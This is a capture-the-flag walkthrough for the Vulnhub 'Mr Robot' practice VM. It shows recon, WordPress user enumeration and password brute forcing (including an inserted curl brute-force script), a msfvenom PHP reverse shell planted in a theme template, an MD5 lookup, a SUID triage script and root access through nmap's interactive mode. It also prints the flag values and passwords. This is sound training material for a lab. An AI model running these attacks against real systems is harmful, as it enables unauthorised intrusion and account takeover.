Mr Robot:1 CTF Walkthrough


Mr Robot: 1 is a CTF (Capture the Flag) virtual machine that you can download from Vulnhub, a site that hosts purposely built, deliberately vulnerable virtual machines for you to practise against. Each one varies in difficulty and lets you hone your skills and even pick up new ones.


If you're interested in giving it a go yourself, the virtual machine can be downloaded here: https://download.vulnhub.com/mrrobot/mrRobot.ova

Description:

Based on the show Mr Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively more difficult to find.

The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

So I downloaded the virtual machine from Vulnhub and just double-clicked the mrRobot.ova file, which imported it into VirtualBox.

I set the network up so that only the Mr Robot VM and my Kali Linux box were on the same subnet. That makes the target easier to find, and you really don't want to expose a deliberately vulnerable VM on your live network. The VM has DHCP enabled, so it picks up a lease straight off the bat.

My first step is to find out which IP the VM has and what services it offers, so I run Nmap to find this out for me. The -A option turns on OS detection, version detection, default scripts and traceroute; OS detection needs raw sockets, so run it as root. Note that only Nmap's default top 1,000 TCP ports are scanned, so a full -p- scan would be the next step if nothing useful turned up.

nmap -A 192.168.1.1/24

and it gives me this information back.

Nmap scan report for 192.168.1.103
Host is up (0.00029s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
MAC Address: 08:00:27:C1:4A:90 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.19

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS
1 0.29 ms 192.168.1.103

As you can see, it looks like we have an Apache web server with ports 80 and 443 open (SSH on 22 is closed), so let's check those out first.
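Picking the target out of a whole /24 by eye is tedious, so here is a small helper, added for this write-up and not part of the original post, that runs the same sweep with greppable output (-oG) and prints each live host's open ports. The subnet and output filename are placeholders, and the sample scan data at the bottom is constructed to look like the scan above rather than being real output.

```shell
#!/bin/sh
# Added example (not from the original post): sweep the lab subnet with nmap,
# save greppable (-oG) output, and pull out every live host's open ports so
# the target is easy to pick out of a /24. Assumptions: the subnet and the
# output filename are placeholders; nmap -A includes OS detection, which
# needs root, hence sudo.

# Run the sweep on a live network (needs nmap and root); not exercised here.
scan_subnet() {
    subnet="${1:-192.168.1.0/24}"
    out="${2:-sweep.gnmap}"
    sudo nmap -A -oG "$out" "$subnet" >/dev/null
    open_ports_from_gnmap "$out"
}

# Parse a -oG file (or stdin) and print "host port/proto/service" for each
# open port. A greppable host line is tab-separated, e.g.
#   Host: 192.168.1.103 ()<TAB>Ports: 22/closed/tcp//ssh///, 80/open/tcp//http//Apache httpd/<TAB>...
# and each port entry is port/state/proto/owner/service/rpcinfo/version/.
open_ports_from_gnmap() {
    awk -F'\t' '
        $1 ~ /^Host: / && index($0, "Ports: ") {
            split($1, h, " "); host = h[2]
            for (i = 2; i <= NF; i++)
                if ($i ~ /^Ports: /) ports = substr($i, 8)
            n = split(ports, p, ", ")
            for (j = 1; j <= n; j++) {
                split(p[j], f, "/")
                if (f[2] == "open")
                    printf "%s %s/%s/%s\n", host, f[1], f[3], f[5]
            }
        }' "${1:-/dev/stdin}"
}

# Constructed sample of greppable output (not real scan data), shaped like the
# scan in the post: a router with DNS open and the target with 80/443 open.
sample_gnmap() {
    printf 'Host: 192.168.1.1 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.1 ()\tPorts: 53/open/tcp//domain///\tIgnored State: closed (999)\n'
    printf 'Host: 192.168.1.103 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.103 ()\tPorts: 22/closed/tcp//ssh///, 80/open/tcp//http//Apache httpd/, 443/open/tcp//ssl|http//Apache httpd/\tIgnored State: filtered (997)\tOS: Linux 3.10 - 3.19\n'
}

# Usage: sample_gnmap | open_ports_from_gnmap
```

Against the sample this prints one line per open port (the closed SSH port is dropped), and on a real network scan_subnet does the same for the saved -oG file.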


On both HTTP and HTTPS we are presented with a cool animation of a Linux terminal booting up and Mr Robot logging in.


At the prompt the only commands that work are the six listed below. Each one takes you to its own page full of Mr Robot propaganda; it looks like a rip-off of the Mr Robot promotional website. I took note of each page in case I needed it later.

http://192.168.1.103/prepare
http://192.168.1.103/fsociety
http://192.168.1.103/inform
http://192.168.1.103/question
http://192.168.1.103/wakeup
http://192.168.1.103/join

Looking at the source, we can see the animation is written in JavaScript. There is also something interesting on line 15. I should add that I am no JavaScript expert, but it looks like a visitor coming from the IP address 208.185.115.6 gets sent to index.html instead.


At this stage I thought it was time to check robots.txt, which is always worth a look because it lists exactly the paths the site owner does not want indexed:

http://192.168.1.103/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

Boom! So it looks like I have found key-1-of-3.txt and a fsocity.dic file.

I first navigate to the key file at http://192.168.1.103/key-1-of-3.txt and get the first key: 073403c8a58a1f80d943455fb30724b9

Then I download fsocity.dic, which is just a wordlist. I'm guessing we will need it later, so I'll keep it somewhere safe.

When the wordlist had finished downloading, I more or less mashed the keyboard and stuck adfsda on the end of the IP address, and I received a WordPress 404 page, as below.


Clicking around the menus, I quite quickly found the WordPress login page at http://192.168.1.103/wp-login.php

Now that we know it's a WordPress site, we can try to enumerate users with WPScan:

wpscan --url 192.168.1.103 --enumerate u

This actually did not find any users for me, so I fell back to guessing and tried admin, root and user, all of which gave me an "Invalid username" error. That error message is itself a user-enumeration oracle: WordPress tells you whether the username exists before it checks the password, so a different message for a real account gives the game away.


So, still with no users, I started trying names of characters from the TV series, starting with mrrobot and flipper, and then got a hit with elliot: this time the error is about a wrong password, which confirms the account exists.


Cool, so we have a user. The next step is to take that dictionary file we downloaded earlier and see if we can brute-force the password for this account, so let's take a look at the dictionary file.

The first thing I notice when I cat the dictionary file is that it is not in any sorted order. That can be fixed by running it through sort:

sort fsocity.dic >fsocitysorted.dic

Catting the new fsocitysorted.dic shows a lot of repeated words, so we run sort again but pipe it into uniq, which collapses the duplicates (uniq only removes repeats that are adjacent, which is why the sort has to come first). This cuts the list from more than 850,000 lines to just over 11,000 unique words and gives us a nice tidy dictionary to run our brute force against.

sort fsocity.dic | uniq > fsocitysortunique.dic

So let's use WPScan again to brute-force the login with our new dictionary file, as below (this is the WPScan 2.x syntax of the time; WPScan 3 takes -U for the username and -P for the wordlist):

wpscan --url http://192.168.1.103 --wordlist /location/of/wordlist/fsocitysortunique.dic --username elliot


This took about 3 minutes to find elliot's password.

  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+
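To make the two steps above concrete without relying on WPScan, here is a small script I have added for this write-up (it is not code from the original post or from WPScan). It normalises the wordlist, then posts to wp-login.php and classifies each response using the distinct error messages that leak whether a username exists and whether a password was wrong. The target URL, the username and the wordlist path are placeholders, and the message strings are the WordPress 4.x wording from the time of this VM; newer WordPress releases word the "unknown user" error differently, so the patterns would need adjusting for a current install.

```shell
#!/bin/sh
# Added example (not part of the original post): normalise the fsocity.dic
# wordlist, then drive wp-login.php and classify each response using the
# distinct messages WordPress returns for "no such user" vs "wrong password".
# Assumptions: the target URL, the user 'elliot' and the wordlist path are
# placeholders; the message strings match WordPress 4.x (2016), newer
# releases word them differently and the patterns must be adjusted.

# Drop CR line endings and blank lines, and keep only the first occurrence
# of each word *in original order* (unlike sort | uniq, which reorders the
# list and so discards any "most likely first" ordering it had).
normalize_wordlist() {
    tr -d '\r' | awk 'NF && !seen[$0]++'
}

# Classify one raw HTTP response (headers + body, as printed by curl -si).
# Prints: success | wrong-password | no-such-user | unknown
classify_wp_login() {
    resp="$(cat)"
    if printf '%s\n' "$resp" | grep -qi '^set-cookie: wordpress_logged_in'; then
        echo success
    elif printf '%s\n' "$resp" | grep -q 'The password you entered for the username'; then
        echo wrong-password
    elif printf '%s\n' "$resp" | grep -q 'Invalid username'; then
        echo no-such-user
    else
        echo unknown
    fi
}

# Post one credential pair and classify the result (needs network + curl).
# The test cookie is sent because wp-login.php refuses logins without it.
wp_login_attempt() {
    url="$1"; user="$2"; pass="$3"
    curl -si "$url/wp-login.php" \
        -b 'wordpress_test_cookie=WP+Cookie+check' \
        --data-urlencode "log=$user" --data-urlencode "pwd=$pass" \
        --data 'wp-submit=Log+In&testcookie=1' | classify_wp_login
}

# Confirm the username exists first (one request), then try every word.
wp_brute() {
    url="$1"; user="$2"; wordlist="$3"
    if [ "$(wp_login_attempt "$url" "$user" x)" = no-such-user ]; then
        echo "user $user does not exist" >&2
        return 1
    fi
    normalize_wordlist < "$wordlist" | while IFS= read -r pass; do
        if [ "$(wp_login_attempt "$url" "$user" "$pass")" = success ]; then
            echo "$user:$pass"
            break
        fi
    done
}

# Usage: sh wp_brute.sh http://192.168.1.103 elliot fsocity.dic
if [ "$#" -eq 3 ]; then
    wp_brute "$1" "$2" "$3"
fi
```

Because the username check is a single request, the script never spends a whole wordlist on an account that does not exist, which is the same saving the "Invalid username" oracle gave us by hand above.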

I put the above details into the http://192.168.1.103/wp-login.php page and bingo, we are into the WordPress dashboard.


Now that we are in the WordPress dashboard we can quite easily use Metasploit to create a payload and gain a shell on the web server: an account that can edit theme files can write arbitrary PHP into the web root, and Apache will happily execute it.

Our first step is to create our Metasploit payload with msfvenom. LHOST and LPORT are the attacking (Kali) machine's IP and the port the handler will listen on:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=7771 -f raw -o payload.php

Now we have our payload, we need to get it onto the site and run it. The best place for this is the 404 page template, because any request for a path that does not exist will execute it.

In the dashboard go to the menu on the left and click Appearance -> Editor, then on the right click 404 Template.

Next open the payload in any text editor, paste its contents over the top of the 404 template and click Update File.

Now we need to set up the matching handler in Metasploit, so open a new terminal and type:

$ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.104
msf exploit(handler) > set LPORT 7771
msf exploit(handler) > run

After you hit enter on run, the handler starts listening. All we need to do now is trigger the payload by making the site serve its 404 page: browse to any path that does not exist, such as http://192.168.1.103/nonexistent, and the shell connects back.

[*] Started reverse TCP handler on 192.168.1.104:7771 
[*] Starting the payload handler...
[*] Sending stage (33721 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.104:7771 -> 192.168.1.103:54730) at 2016-08-19 17:00:48 +0100

meterpreter > 


Then in Meterpreter just type shell to spawn a shell on the box, and check which directory we are in and which user we are running as.

meterpreter > shell 
Process 1797 created.
Channel 0 created. 
pwd 
/opt/bitnami/apps/wordpress/htdocs 
whoami 
daemon

Then I changed directory to the root of the filesystem and listed everything there.

cd / 
ls 
bin 
boot
dev 
etc 
home 
initrd.img 
lib
lib64
lost+found
media
mnt
opt
proc
root 
run 
sbin 
srv 
sys 
tmp
usr
var
vmlinuz

I start by checking out the home folder, which contains just one directory, robot. Inside it we find our next key and an MD5 file.

cd home
ls
robot
cd robot
ls
key-2-of-3.txt
password.raw-md5

First I try to cat the key file, but I get permission denied. I also try password.raw-md5, and that one does display its contents, see below.

cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

So it looks like we have a username and an MD5-hashed password. I could run this through hashcat, but as this is an easy VM I googled the hash first, and as I expected it comes back almost instantly as abcdefghijklmnopqrstuvwxyz. An unsalted MD5 of a common string like this is in every lookup table, which is why no cracking was needed.


I try to switch user to robot, but I keep getting a message telling me that su must be run from a terminal.

su robot 
su: must be run from a terminal

This shows that we don't have a proper interactive shell: the process was spawned from Apache with no controlling terminal, so su has nowhere to prompt for a password. A bit of Python gets around that by allocating a pseudo-terminal and running bash inside it:

python -c 'import pty; pty.spawn("/bin/bash")'

We can tell we are in a proper shell because the prompt now shows the user we are, the name of the server and the directory we are in.

daemon@linux:/home/robot$

So we try to switch to the robot user again, and this time we are prompted for the password. Entering the password we recovered from the MD5 hash logs us in as robot.

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$

Now that we are logged in as robot, we should be able to cat the key file, since we have the right permissions.

robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

With key 2 found we have just one more to find. I'm guessing we need to escalate privileges again, this time to root. I tried a few exploits off Exploit-DB but none of them worked, so I started looking for other ways to get to root.

Listing every file with the setuid or setgid bit set (that is what -perm +6000 matches) shows that nmap is installed setuid root, so whoever runs it gets root's privileges for as long as the binary lets them.

find / -perm +6000 2>/dev/null | grep '/bin/'
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
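A long SUID list like the one above is easier to read if the stock entries are filtered out and the dangerous ones are highlighted. The helper below is added for this write-up (it is not from the original post): the baseline list of expected Debian/Ubuntu setuid and setgid binaries and the list of known shell-spawning escalators are my own hand-picked selections, not an exhaustive catalogue, and the input in the test is constructed. It also uses -perm /6000, because newer GNU findutils no longer accept the older +6000 form used above.

```shell
#!/bin/sh
# Added example (not part of the original post): list setuid/setgid binaries
# and flag the ones that are known to hand out a shell or arbitrary file
# access when they run as root. The candidate list is a hand-picked subset of
# GTFOBins-style entries chosen here; it is not exhaustive.
# Note: "-perm +6000" (used in the post) is legacy syntax that newer GNU
# findutils reject; "-perm /6000" means the same (either bit set).

# Basenames whose setuid/setgid bit is expected on a stock Debian/Ubuntu box.
baseline='ping ping6 mount umount su passwd newgrp chsh chfn gpasswd chage expiry sudo crontab wall ssh-agent screen mail-lock mail-unlock mail-touchlock dotlockfile'
# Basenames that can spawn a shell or read/write arbitrary files as root.
escalators='nmap vim vi nano find bash sh dash python python2 python3 perl less more awk gawk env cp mv tee tar zip'

# find_suid: enumerate candidates on the live host (needs a shell on the box).
find_suid() {
    find / -perm /6000 -type f 2>/dev/null | triage_suid
}

# triage_suid: read paths on stdin; print "FLAG <path>" for known escalators,
# "NEW <path>" for anything outside the stock baseline, and skip the rest.
triage_suid() {
    while IFS= read -r path; do
        name="${path##*/}"
        case " $escalators " in
            *" $name "*) echo "FLAG $path"; continue ;;
        esac
        case " $baseline " in
            *" $name "*) ;;
            *) echo "NEW $path" ;;
        esac
    done
}

# Usage on the target: find_suid
```

Run against the list from the post it prints a single FLAG line for /usr/local/bin/nmap, which is exactly the binary the next step abuses.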

After a lot of googling I found that old versions of Nmap (this box ships 3.81) have an interactive mode in which any line starting with ! is handed to a shell. Nmap does not drop its privileges first, so with the setuid bit set that shell runs as root. Interactive mode was removed from later Nmap releases, so this trick only works against old binaries like this one.

robot@linux:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# ls
ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv tmp  var
boot  etc  initrd.img  lib64  media   opt  root  sbin  sys usr  vmlinuz
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt

So we escalated our privileges to root through the interactive shell (the # prompt confirms it) and navigated to /root, which holds our final key. Catting it gives us:

cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Now we have all 3 keys, and that's this virtual machine done. It was a really good VM to get started with; finding out about the privilege escalation via Nmap was fantastic, and being a fan of the Mr Robot TV show really helped keep me interested.

I'm going to have another look at Vulnhub and see if there are any more TV/movie tie-ins I can sink my teeth into.
